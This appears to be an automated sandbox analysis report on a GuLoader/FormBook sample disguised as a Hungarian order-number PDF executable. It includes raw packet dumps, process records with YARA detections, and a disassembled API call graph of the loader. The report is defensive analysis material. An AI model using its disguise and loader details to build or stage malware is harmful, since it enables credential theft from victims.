                                            Nov 25, 2024 10:27:36.431195021 CET1236INData Raw: 14 94 b7 b2 99 04 9c 72 54 76 cb 38 75 37 a2 20 0c f2 05 f8 b2 31 3e ac 2b 2a 80 00 43 15 31 39 f4 f1 61 12 6e c0 ed 3d e8 50 01 9d 92 21 82 f6 f8 95 7f 5a 35 4d 54 7a 6f 00 dc e1 0a 45 5c 84 71 18 b6 aa 90 c1 0e f5 92 d7 dd 1e b3 35 7e 9a 17 51
                                            Data Ascii: rTv8u7 1>+*C19an=P!Z5MTzoE\q5~QV\L`6=FAv.G$.~[hAf^ZAszTcp&E.mlG~D4d:l$p'c@U+I8o[
                                            Nov 25, 2024 10:27:36.431205988 CET1236INData Raw: 61 a0 5c ab 6b 52 ce d5 e2 51 54 eb 81 03 b0 40 6f 89 19 0b 29 0d c8 9b 99 24 88 d1 52 81 4a 5a 1d d0 1c fd 06 f5 a5 11 35 ca 60 eb 52 9b 8b 76 f6 56 8d a9 c4 6a 46 af 26 1c bf 6c f0 07 2b f7 7a 53 ed 19 0e a7 fe d7 c8 b8 f7 01 a4 3a 7d 05 08 b1
                                            Data Ascii: a\kRQT@o)$RJZ5`RvVjF&l+zS:}/!Qtb((CW1w#Wf@"utD,NkRf{Zr6f[q!~"s8gKy>G).s@)"!NE6~5.'(/6>6eCe+)A?;c^
                                            Nov 25, 2024 10:27:36.431217909 CET776INData Raw: 34 7d c8 ac 43 b7 f2 a4 ad 4a d9 b6 bd c5 32 90 20 92 54 01 ed 9a 79 fb 8a 33 32 f8 5c b4 fc c8 7a fc 3b 1d e2 7b 87 c5 b8 6c 62 19 21 e8 11 5a 2c 32 c4 5f 4c d8 6f ba 9c 4d e5 33 23 91 2b a6 01 ae e6 67 48 cc 5f 86 e6 4a 86 7c 42 50 60 17 f7 b8
                                            Data Ascii: 4}CJ2 Ty32\z;{lb!Z,2_LoM3#+gH_J|BP`|GqvfJ#`noU3B'z*SfrTrH@Cd2%y?byA(p|-([5w^wp|ln0OD<XY`A
                                            Nov 25, 2024 10:27:36.431230068 CET1236INData Raw: 67 79 df 19 fb d4 7b 4a a6 99 f6 e1 33 58 b1 e8 95 2e c3 ca 83 de 9a 8a 7c f0 92 dc 8f d0 aa 12 8d 86 a4 ed b3 df 7e f1 22 de 2e f7 14 0d 9b a7 88 d4 1c 41 72 b1 23 36 8e 8c 4f b1 38 a5 a4 7b 9b 52 b7 9c 0c 50 21 a5 53 3d 98 a9 e0 04 e0 a5 0a c6
                                            Data Ascii: gy{J3X.|~".Ar#6O8{RP!S=JCC3YG$z\of:/v+Up[>AM(BVJZG]I,r`C%@?s\|s!g8Z"-SrP]Y\4+&{Y^(@a{)w7G^1
                                            Nov 25, 2024 10:27:36.431304932 CET1236INData Raw: 72 34 b9 34 f8 89 62 ea 79 da f0 f2 0e 1a 52 fd 43 95 2f 23 c8 98 18 c8 9f a9 2c 03 b0 07 2f 28 ec 1b 87 7a e0 c3 76 22 0e a5 32 0f 24 84 70 60 06 a8 81 2a 98 d8 c8 39 6c 6a 9e 85 f3 4d 0e 4f 65 08 ad 50 b9 91 02 dc 46 47 cf 65 04 0f 77 9f 03 9a
                                            Data Ascii: r44byRC/#,/(zv"2$p`*9ljMOePFGew.b6rXjvl+G8'F(h3-)li*\e^+{$Hv,)z:2lF{z!h2`B?[g}~o_Xpt6N
                                            Nov 25, 2024 10:27:36.431320906 CET1236INData Raw: 1e 3f 2c 00 69 1b c6 06 5a 75 4a 4f de bd 44 a5 32 bc b1 7a 97 80 60 cf 22 a4 6a 2d 3f aa c6 eb 36 ba af b4 47 bb 36 df e8 6d ec a4 fb f8 97 e7 b6 25 18 62 f3 5d 3a e3 90 e1 1a a8 1d 88 9a 9b 8e 4c e6 9a 01 6e d5 67 f8 41 27 0a 82 75 d5 25 37 b0
                                            Data Ascii: ?,iZuJOD2z`"j-?6G6m%b]:LngA'u%7.j>.We3@Sfa$rGeW#fxyY$eMZ oh}bL%{.qsGGcvRBe_f6h;oa$m^MOJr[]|F1
                                            Nov 25, 2024 10:27:36.551014900 CET1236INData Raw: a2 be e7 7e 3a 5b 9c a6 4a a5 60 6e 95 73 45 29 64 91 c7 09 36 06 7b 2d 64 c8 c6 50 11 48 ed 2e f1 4c 2e 40 fa 16 17 22 0e 23 68 85 2a d1 9d 0b 73 ef 14 9a ea 2e 94 d7 e6 0c 80 2b c4 7a ed fc 22 a7 75 21 41 d5 d6 60 e5 76 0d cb ed 82 07 31 32 e8
                                            Data Ascii: ~:[J`nsE)d6{-dPH.L.@"#h*s.+z"u!A`v12y9msR8B0|JRZ v_"TWOOoguOEK/I( :o.)Ou'rIiE8bR8>sm!q1,XrCq%$uWfH


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:04:25:59
                                            Start date:25/11/2024
                                            Path:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
                                            Imagebase:0x400000
                                            File size:992'543 bytes
                                            MD5 hash:F669EAF2B985A35F3B1BF21D73B7CAF2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2572461469.0000000004B5D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:04:27:26
                                            Start date:25/11/2024
                                            Path:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
                                            Imagebase:0x400000
                                            File size:992'543 bytes
                                            MD5 hash:F669EAF2B985A35F3B1BF21D73B7CAF2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:04:27:54
                                            Start date:25/11/2024
                                            Path:C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe"
                                            Imagebase:0x7d0000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:7
                                            Start time:04:27:56
                                            Start date:25/11/2024
                                            Path:C:\Windows\SysWOW64\sdchange.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                            Imagebase:0x9a0000
                                            File size:40'960 bytes
                                            MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:18.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:19.6%
                                              Total number of Nodes:1567
                                              Total number of Limit Nodes:35
                                              execution_graph 4149 401941 4150 401943 4149->4150 4155 402c41 4150->4155 4156 402c4d 4155->4156 4201 4062a6 4156->4201 4159 401948 4161 405996 4159->4161 4243 405c61 4161->4243 4164 4059d5 4167 405b00 4164->4167 4257 406284 lstrcpynW 4164->4257 4165 4059be DeleteFileW 4166 401951 4165->4166 4167->4166 4286 4065c7 FindFirstFileW 4167->4286 4169 4059fb 4170 405a01 lstrcatW 4169->4170 4171 405a0e 4169->4171 4172 405a14 4170->4172 4258 405ba5 lstrlenW 4171->4258 4175 405a24 lstrcatW 4172->4175 4176 405a1a 4172->4176 4178 405a2f lstrlenW FindFirstFileW 4175->4178 4176->4175 4176->4178 4180 405af5 4178->4180 4195 405a51 4178->4195 4179 405b1e 4289 405b59 lstrlenW CharPrevW 4179->4289 4180->4167 4183 40594e 5 API calls 4186 405b30 4183->4186 4185 405ad8 FindNextFileW 4187 405aee FindClose 4185->4187 4185->4195 4188 405b34 4186->4188 4189 405b4a 4186->4189 4187->4180 4188->4166 4192 4052ec 24 API calls 4188->4192 4191 4052ec 24 API calls 4189->4191 4191->4166 4194 405b41 4192->4194 4193 405996 60 API calls 4193->4195 4197 40604a 36 API calls 4194->4197 4195->4185 4195->4193 4196 4052ec 24 API calls 4195->4196 4262 406284 lstrcpynW 4195->4262 4263 40594e 4195->4263 4271 4052ec 4195->4271 4282 40604a MoveFileExW 4195->4282 4196->4185 4198 405b48 4197->4198 4198->4166 4209 4062b3 4201->4209 4202 4064fe 4203 402c6e 4202->4203 4234 406284 lstrcpynW 4202->4234 4203->4159 4218 406518 4203->4218 4205 4064cc lstrlenW 4205->4209 4207 4062a6 10 API calls 4207->4205 4209->4202 4209->4205 4209->4207 4211 4063e1 GetSystemDirectoryW 4209->4211 4212 4063f4 GetWindowsDirectoryW 4209->4212 4213 406518 5 API calls 4209->4213 4214 4062a6 10 API calls 4209->4214 4215 40646f lstrcatW 4209->4215 4216 406428 SHGetSpecialFolderLocation 4209->4216 4227 406152 4209->4227 4232 4061cb wsprintfW 4209->4232 4233 406284 lstrcpynW 4209->4233 4211->4209 4212->4209 4213->4209 4214->4209 4215->4209 4216->4209 4217 406440 SHGetPathFromIDListW CoTaskMemFree 4216->4217 4217->4209 4224 406525 4218->4224 4219 4065a0 CharPrevW 4222 40659b 4219->4222 4220 40658e CharNextW 4220->4222 4220->4224 4222->4219 4223 4065c1 4222->4223 4223->4159 4224->4220 4224->4222 4225 40657a CharNextW 4224->4225 4226 406589 CharNextW 4224->4226 4239 405b86 4224->4239 4225->4224 4226->4220 4235 4060f1 4227->4235 4230 4061b6 4230->4209 4231 406186 RegQueryValueExW RegCloseKey 4231->4230 4232->4209 4233->4209 4234->4203 4236 406100 4235->4236 4237 406104 4236->4237 4238 406109 RegOpenKeyExW 4236->4238 4237->4230 4237->4231 4238->4237 4240 405b8c 4239->4240 4241 405ba2 4240->4241 4242 405b93 CharNextW 4240->4242 4241->4224 4242->4240 4292 406284 lstrcpynW 4243->4292 4245 405c72 4293 405c04 CharNextW CharNextW 4245->4293 4248 4059b6 4248->4164 4248->4165 4249 406518 5 API calls 4255 405c88 4249->4255 4250 405cb9 lstrlenW 4251 405cc4 4250->4251 4250->4255 4252 405b59 3 API calls 4251->4252 4254 405cc9 GetFileAttributesW 4252->4254 4253 4065c7 2 API calls 4253->4255 4254->4248 4255->4248 4255->4250 4255->4253 4256 405ba5 2 API calls 4255->4256 4256->4250 4257->4169 4259 405bb3 4258->4259 4260 405bc5 4259->4260 4261 405bb9 CharPrevW 4259->4261 4260->4172 4261->4259 4261->4260 4262->4195 4299 405d55 GetFileAttributesW 4263->4299 4266 40597b 4266->4195 4267 405971 DeleteFileW 4269 405977 4267->4269 4268 405969 RemoveDirectoryW 4268->4269 4269->4266 4270 405987 SetFileAttributesW 4269->4270 4270->4266 4272 4053a9 4271->4272 4274 405307 4271->4274 4272->4195 4273 405323 lstrlenW 4276 405331 lstrlenW 4273->4276 4277 40534c 4273->4277 4274->4273 4275 4062a6 17 API calls 4274->4275 4275->4273 4276->4272 4278 405343 lstrcatW 4276->4278 4279 405352 SetWindowTextW 4277->4279 4280 40535f 4277->4280 4278->4277 4279->4280 4280->4272 4281 405365 SendMessageW SendMessageW SendMessageW 4280->4281 4281->4272 4283 40606b 4282->4283 4284 40605e 4282->4284 4283->4195 4302 405ed0 4284->4302 4287 405b1a 4286->4287 4288 4065dd FindClose 4286->4288 4287->4166 4287->4179 4288->4287 4290 405b24 4289->4290 4291 405b75 lstrcatW 4289->4291 4290->4183 4291->4290 4292->4245 4294 405c21 4293->4294 4297 405c33 4293->4297 4295 405c2e CharNextW 4294->4295 4294->4297 4298 405c57 4295->4298 4296 405b86 CharNextW 4296->4297 4297->4296 4297->4298 4298->4248 4298->4249 4300 40595a 4299->4300 4301 405d67 SetFileAttributesW 4299->4301 4300->4266 4300->4267 4300->4268 4301->4300 4303 405f00 4302->4303 4304 405f26 GetShortPathNameW 4302->4304 4329 405d7a GetFileAttributesW CreateFileW 4303->4329 4306 406045 4304->4306 4307 405f3b 4304->4307 4306->4283 4307->4306 4309 405f43 wsprintfA 4307->4309 4308 405f0a CloseHandle GetShortPathNameW 4308->4306 4310 405f1e 4308->4310 4311 4062a6 17 API calls 4309->4311 4310->4304 4310->4306 4312 405f6b 4311->4312 4330 405d7a GetFileAttributesW CreateFileW 4312->4330 4314 405f78 4314->4306 4315 405f87 GetFileSize GlobalAlloc 4314->4315 4316 405fa9 4315->4316 4317 40603e CloseHandle 4315->4317 4331 405dfd ReadFile 4316->4331 4317->4306 4322 405fc8 lstrcpyA 4325 405fea 4322->4325 4323 405fdc 4324 405cdf 4 API calls 4323->4324 4324->4325 4326 406021 SetFilePointer 4325->4326 4338 405e2c WriteFile 4326->4338 4329->4308 4330->4314 4332 405e1b 4331->4332 4332->4317 4333 405cdf lstrlenA 4332->4333 4334 405d20 lstrlenA 4333->4334 4335 405cf9 lstrcmpiA 4334->4335 4336 405d28 4334->4336 4335->4336 4337 405d17 CharNextA 4335->4337 4336->4322 4336->4323 4337->4334 4339 405e4a GlobalFree 4338->4339 4339->4317 4340 4015c1 4341 402c41 17 API calls 4340->4341 4342 4015c8 4341->4342 4343 405c04 4 API calls 4342->4343 4355 4015d1 4343->4355 4344 401631 4346 401663 4344->4346 4347 401636 4344->4347 4345 405b86 CharNextW 4345->4355 4349 401423 24 API calls 4346->4349 4367 401423 4347->4367 4356 40165b 4349->4356 4354 40164a SetCurrentDirectoryW 4354->4356 4355->4344 4355->4345 4357 401617 GetFileAttributesW 4355->4357 4359 405855 4355->4359 4362 4057bb CreateDirectoryW 4355->4362 4371 405838 CreateDirectoryW 4355->4371 4357->4355 4374 40665e GetModuleHandleA 4359->4374 4363 405808 4362->4363 4364 40580c GetLastError 4362->4364 4363->4355 4364->4363 4365 40581b SetFileSecurityW 4364->4365 4365->4363 4366 405831 GetLastError 4365->4366 4366->4363 4368 4052ec 24 API calls 4367->4368 4369 401431 4368->4369 4370 406284 lstrcpynW 4369->4370 4370->4354 4372 405848 4371->4372 4373 40584c GetLastError 4371->4373 4372->4355 4373->4372 4375 406684 GetProcAddress 4374->4375 4376 40667a 4374->4376 4378 40585c 4375->4378 4380 4065ee GetSystemDirectoryW 4376->4380 4378->4355 4379 406680 4379->4375 4379->4378 4381 406610 wsprintfW LoadLibraryExW 4380->4381 4381->4379 5178 6fbc103d 5181 6fbc101b 5178->5181 5188 6fbc1516 5181->5188 5183 6fbc1020 5184 6fbc1024 5183->5184 5185 6fbc1027 GlobalAlloc 5183->5185 5186 6fbc153d 3 API calls 5184->5186 5185->5184 5187 6fbc103b 5186->5187 5190 6fbc151c 5188->5190 5189 6fbc1522 5189->5183 5190->5189 5191 6fbc152e GlobalFree 5190->5191 5191->5183 5192 404a42 5193 404a52 5192->5193 5194 404a6e 5192->5194 5203 4058ce GetDlgItemTextW 5193->5203 5196 404aa1 5194->5196 5197 404a74 SHGetPathFromIDListW 5194->5197 5199 404a84 5197->5199 5202 404a8b SendMessageW 5197->5202 5198 404a5f SendMessageW 5198->5194 5201 40140b 2 API calls 5199->5201 5201->5202 5202->5196 5203->5198 4567 401e49 4568 402c1f 17 API calls 4567->4568 4569 401e4f 4568->4569 4570 402c1f 17 API calls 4569->4570 4571 401e5b 4570->4571 4572 401e72 EnableWindow 4571->4572 4573 401e67 ShowWindow 4571->4573 4574 402ac5 4572->4574 4573->4574 4575 40264a 4576 402c1f 17 API calls 4575->4576 4577 402659 4576->4577 4578 4026a3 ReadFile 4577->4578 4579 405dfd ReadFile 4577->4579 4580 40273c 4577->4580 4581 4026e3 MultiByteToWideChar 4577->4581 4582 402798 4577->4582 4585 402709 SetFilePointer MultiByteToWideChar 4577->4585 4586 4027a9 4577->4586 4588 402796 4577->4588 4578->4577 4578->4588 4579->4577 4580->4577 4580->4588 4589 405e5b SetFilePointer 4580->4589 4581->4577 4598 4061cb wsprintfW 4582->4598 4585->4577 4587 4027ca SetFilePointer 4586->4587 4586->4588 4587->4588 4590 405e77 4589->4590 4597 405e8f 4589->4597 4591 405dfd ReadFile 4590->4591 4592 405e83 4591->4592 4593 405ec0 SetFilePointer 4592->4593 4594 405e98 SetFilePointer 4592->4594 4592->4597 4593->4597 4594->4593 4595 405ea3 4594->4595 4596 405e2c WriteFile 4595->4596 4596->4597 4597->4580 4598->4588 5228 4016cc 5229 402c41 17 API calls 5228->5229 5230 4016d2 GetFullPathNameW 5229->5230 5231 40170e 5230->5231 5232 4016ec 5230->5232 5233 401723 GetShortPathNameW 5231->5233 5234 402ac5 5231->5234 5232->5231 5235 4065c7 2 API calls 5232->5235 5233->5234 5236 4016fe 5235->5236 5236->5231 5238 406284 lstrcpynW 5236->5238 5238->5231 5239 40234e 5240 402c41 17 API calls 5239->5240 5241 40235d 5240->5241 5242 402c41 17 API calls 5241->5242 5243 402366 5242->5243 5244 402c41 17 API calls 5243->5244 5245 402370 GetPrivateProfileStringW 5244->5245 5246 401b53 5247 402c41 17 API calls 5246->5247 5248 401b5a 5247->5248 5249 402c1f 17 API calls 5248->5249 5250 401b63 wsprintfW 5249->5250 5251 402ac5 5250->5251 5252 401956 5253 402c41 17 API calls 5252->5253 5254 40195d lstrlenW 5253->5254 5255 402592 5254->5255 5256 4014d7 5257 402c1f 17 API calls 5256->5257 5258 4014dd Sleep 5257->5258 5260 402ac5 5258->5260 5261 401f58 5262 402c41 17 API calls 5261->5262 5263 401f5f 5262->5263 5264 4065c7 2 API calls 5263->5264 5265 401f65 5264->5265 5267 401f76 5265->5267 5268 4061cb wsprintfW 5265->5268 5268->5267 4932 403359 SetErrorMode GetVersion 4933 403398 4932->4933 4934 40339e 4932->4934 4935 40665e 5 API calls 4933->4935 4936 4065ee 3 API calls 4934->4936 4935->4934 4937 4033b4 lstrlenA 4936->4937 4937->4934 4938 4033c4 4937->4938 4939 40665e 5 API calls 4938->4939 4940 4033cb 4939->4940 4941 40665e 5 API calls 4940->4941 4942 4033d2 4941->4942 4943 40665e 5 API calls 4942->4943 4944 4033de #17 OleInitialize SHGetFileInfoW 4943->4944 5022 406284 lstrcpynW 4944->5022 4947 40342a GetCommandLineW 5023 406284 lstrcpynW 4947->5023 4949 40343c 4950 405b86 CharNextW 4949->4950 4951 403461 CharNextW 4950->4951 4952 40358b GetTempPathW 4951->4952 4958 40347a 4951->4958 5024 403328 4952->5024 4954 4035a3 4955 4035a7 GetWindowsDirectoryW lstrcatW 4954->4955 4956 4035fd DeleteFileW 4954->4956 4959 403328 12 API calls 4955->4959 5034 402edd GetTickCount GetModuleFileNameW 4956->5034 4960 405b86 CharNextW 4958->4960 4964 403574 4958->4964 4967 403576 4958->4967 4962 4035c3 4959->4962 4960->4958 4961 403611 4965 4036b4 4961->4965 4969 405b86 CharNextW 4961->4969 5017 4036c4 4961->5017 4962->4956 4963 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4962->4963 4968 403328 12 API calls 4963->4968 4964->4952 5062 403974 4965->5062 5118 406284 lstrcpynW 4967->5118 4973 4035f5 4968->4973 4986 403630 4969->4986 4973->4956 4973->5017 4974 4037fe 4976 403882 ExitProcess 4974->4976 4977 403806 GetCurrentProcess OpenProcessToken 4974->4977 4975 4036de 4978 4058ea MessageBoxIndirectW 4975->4978 4979 403852 4977->4979 4980 40381e LookupPrivilegeValueW AdjustTokenPrivileges 4977->4980 4984 4036ec ExitProcess 4978->4984 4985 40665e 5 API calls 4979->4985 4980->4979 4982 4036f4 4988 405855 5 API calls 4982->4988 4983 40368e 4987 405c61 18 API calls 4983->4987 4990 403859 4985->4990 4986->4982 4986->4983 4991 40369a 4987->4991 4989 4036f9 lstrcatW 4988->4989 4992 403715 lstrcatW lstrcmpiW 4989->4992 4993 40370a lstrcatW 4989->4993 4994 40386e ExitWindowsEx 4990->4994 4997 40387b 4990->4997 4991->5017 5119 406284 lstrcpynW 4991->5119 4996 403731 4992->4996 4992->5017 4993->4992 4994->4976 4994->4997 4999 403736 4996->4999 5000 40373d 4996->5000 5001 40140b 2 API calls 4997->5001 4998 4036a9 5120 406284 lstrcpynW 4998->5120 5003 4057bb 4 API calls 4999->5003 5004 405838 2 API calls 5000->5004 5001->4976 5005 40373b 5003->5005 5006 403742 SetCurrentDirectoryW 5004->5006 5005->5006 5007 403752 5006->5007 5008 40375d 5006->5008 5128 406284 lstrcpynW 5007->5128 5129 406284 lstrcpynW 5008->5129 5011 4062a6 17 API calls 5012 40379c DeleteFileW 5011->5012 5013 4037a9 CopyFileW 5012->5013 5019 40376b 5012->5019 5013->5019 5014 4037f2 5016 40604a 36 API calls 5014->5016 5015 40604a 36 API calls 5015->5019 5016->5017 5121 40389a 5017->5121 5018 4062a6 17 API calls 5018->5019 5019->5011 5019->5014 5019->5015 5019->5018 5021 4037dd CloseHandle 5019->5021 5130 40586d CreateProcessW 5019->5130 5021->5019 5022->4947 5023->4949 5025 406518 5 API calls 5024->5025 5026 403334 5025->5026 5027 40333e 5026->5027 5028 405b59 3 API calls 5026->5028 5027->4954 5029 403346 5028->5029 5030 405838 2 API calls 5029->5030 5031 40334c 5030->5031 5133 405da9 5031->5133 5137 405d7a GetFileAttributesW CreateFileW 5034->5137 5036 402f1d 5055 402f2d 5036->5055 5138 406284 lstrcpynW 5036->5138 5038 402f43 5039 405ba5 2 API calls 5038->5039 5040 402f49 5039->5040 5139 406284 lstrcpynW 5040->5139 5042 402f54 GetFileSize 5043 403050 5042->5043 5061 402f6b 5042->5061 5140 402e79 5043->5140 5045 403059 5047 403089 GlobalAlloc 5045->5047 5045->5055 5152 403311 SetFilePointer 5045->5152 5046 4032fb ReadFile 5046->5061 5151 403311 SetFilePointer 5047->5151 5049 4030bc 5051 402e79 6 API calls 5049->5051 5051->5055 5052 403072 5056 4032fb ReadFile 5052->5056 5053 4030a4 5054 403116 35 API calls 5053->5054 5059 4030b0 5054->5059 5055->4961 5057 40307d 5056->5057 5057->5047 5057->5055 5058 402e79 6 API calls 5058->5061 5059->5055 5059->5059 5060 4030ed SetFilePointer 5059->5060 5060->5055 5061->5043 5061->5046 5061->5049 5061->5055 5061->5058 5063 40665e 5 API calls 5062->5063 5064 403988 5063->5064 5065 4039a0 5064->5065 5066 40398e 5064->5066 5067 406152 3 API calls 5065->5067 5165 4061cb wsprintfW 5066->5165 5068 4039d0 5067->5068 5070 4039ef lstrcatW 5068->5070 5072 406152 3 API calls 5068->5072 5071 40399e 5070->5071 5157 403c4a 5071->5157 5072->5070 5075 405c61 18 API calls 5076 403a21 5075->5076 5077 403ab5 5076->5077 5079 406152 3 API calls 5076->5079 5078 405c61 18 API calls 5077->5078 5080 403abb 5078->5080 5081 403a53 5079->5081 5082 403acb LoadImageW 5080->5082 5083 4062a6 17 API calls 5080->5083 5081->5077 5086 403a74 lstrlenW 5081->5086 5089 405b86 CharNextW 5081->5089 5084 403b71 5082->5084 5085 403af2 RegisterClassW 5082->5085 5083->5082 5088 40140b 2 API calls 5084->5088 5087 403b28 SystemParametersInfoW CreateWindowExW 5085->5087 5117 403b7b 5085->5117 5090 403a82 lstrcmpiW 5086->5090 5091 403aa8 5086->5091 5087->5084 5092 403b77 5088->5092 5093 403a71 5089->5093 5090->5091 5094 403a92 GetFileAttributesW 5090->5094 5095 405b59 3 API calls 5091->5095 5097 403c4a 18 API calls 5092->5097 5092->5117 5093->5086 5096 403a9e 5094->5096 5098 403aae 5095->5098 5096->5091 5099 405ba5 2 API calls 5096->5099 5100 403b88 5097->5100 5166 406284 lstrcpynW 5098->5166 5099->5091 5102 403b94 ShowWindow 5100->5102 5103 403c17 5100->5103 5104 4065ee 3 API calls 5102->5104 5105 4053bf 5 API calls 5103->5105 5106 403bac 5104->5106 5107 403c1d 5105->5107 5108 403bba GetClassInfoW 5106->5108 5111 4065ee 3 API calls 5106->5111 5109 403c21 5107->5109 5110 403c39 5107->5110 5113 403be4 DialogBoxParamW 5108->5113 5114 403bce GetClassInfoW RegisterClassW 5108->5114 5115 40140b 2 API calls 5109->5115 5109->5117 5112 40140b 2 API calls 5110->5112 5111->5108 5112->5117 5116 40140b 2 API calls 5113->5116 5114->5113 5115->5117 5116->5117 5117->5017 5118->4964 5119->4998 5120->4965 5122 4038b2 5121->5122 5123 4038a4 CloseHandle 5121->5123 5168 4038df 5122->5168 5123->5122 5126 405996 67 API calls 5127 4036cd OleUninitialize 5126->5127 5127->4974 5127->4975 5128->5008 5129->5019 5131 4058a0 CloseHandle 5130->5131 5132 4058ac 5130->5132 5131->5132 5132->5019 5134 405db6 GetTickCount GetTempFileNameW 5133->5134 5135 403357 5134->5135 5136 405dec 5134->5136 5135->4954 5136->5134 5136->5135 5137->5036 5138->5038 5139->5042 5141 402e82 5140->5141 5142 402e9a 5140->5142 5143 402e92 5141->5143 5144 402e8b DestroyWindow 5141->5144 5145 402ea2 5142->5145 5146 402eaa GetTickCount 5142->5146 5143->5045 5144->5143 5153 40669a 5145->5153 5147 402eb8 CreateDialogParamW ShowWindow 5146->5147 5148 402edb 5146->5148 5147->5148 5148->5045 5151->5053 5152->5052 5154 4066b7 PeekMessageW 5153->5154 5155 402ea8 5154->5155 5156 4066ad DispatchMessageW 5154->5156 5155->5045 5156->5154 5158 403c5e 5157->5158 5167 4061cb wsprintfW 5158->5167 5160 403ccf 5161 403d03 18 API calls 5160->5161 5163 403cd4 5161->5163 5162 4039ff 5162->5075 5163->5162 5164 4062a6 17 API calls 5163->5164 5164->5163 5165->5071 5166->5077 5167->5160 5169 4038ed 5168->5169 5170 4038b7 5169->5170 5171 4038f2 FreeLibrary GlobalFree 5169->5171 5170->5126 5171->5170 5171->5171 5269 402259 5270 402c41 17 API calls 5269->5270 5271 40225f 5270->5271 5272 402c41 17 API calls 5271->5272 5273 402268 5272->5273 5274 402c41 17 API calls 5273->5274 5275 402271 5274->5275 5276 4065c7 2 API calls 5275->5276 5277 40227a 5276->5277 5278 40228b lstrlenW lstrlenW 5277->5278 5282 40227e 5277->5282 5279 4052ec 24 API calls 5278->5279 5281 4022c9 SHFileOperationW 5279->5281 5280 4052ec 24 API calls 5283 402286 5280->5283 5281->5282 5281->5283 5282->5280 5172 40175c 5173 402c41 17 API calls 5172->5173 5174 401763 5173->5174 5175 405da9 2 API calls 5174->5175 5176 40176a 5175->5176 5177 405da9 2 API calls 5176->5177 5177->5176 5291 401d5d GetDlgItem GetClientRect 5292 402c41 17 API calls 5291->5292 5293 401d8f LoadImageW SendMessageW 5292->5293 5294 402ac5 5293->5294 5295 401dad DeleteObject 5293->5295 5295->5294 5296 4022dd 5297 4022e4 5296->5297 5300 4022f7 5296->5300 5298 4062a6 17 API calls 5297->5298 5299 4022f1 5298->5299 5301 4058ea MessageBoxIndirectW 5299->5301 5301->5300 5302 405260 5303 405270 5302->5303 5304 405284 5302->5304 5305 405276 5303->5305 5306 4052cd 5303->5306 5307 40528c IsWindowVisible 5304->5307 5313 4052a3 5304->5313 5310 404247 SendMessageW 5305->5310 5309 4052d2 CallWindowProcW 5306->5309 5307->5306 5308 405299 5307->5308 5315 404bb6 SendMessageW 5308->5315 5312 405280 5309->5312 5310->5312 5313->5309 5320 404c36 5313->5320 5316 404c15 SendMessageW 5315->5316 5317 404bd9 GetMessagePos ScreenToClient SendMessageW 5315->5317 5319 404c0d 5316->5319 5318 404c12 5317->5318 5317->5319 5318->5316 5319->5313 5329 406284 lstrcpynW 5320->5329 5322 404c49 5330 4061cb wsprintfW 5322->5330 5324 404c53 5325 40140b 2 API calls 5324->5325 5326 404c5c 5325->5326 5331 406284 lstrcpynW 5326->5331 5328 404c63 5328->5306 5329->5322 5330->5324 5331->5328 5332 401563 5333 402a6b 5332->5333 5336 4061cb wsprintfW 5333->5336 5335 402a70 5336->5335 4490 4023e4 4491 402c41 17 API calls 4490->4491 4492 4023f6 4491->4492 4493 402c41 17 API calls 4492->4493 4494 402400 4493->4494 4507 402cd1 4494->4507 4497 402c41 17 API calls 4500 40242e 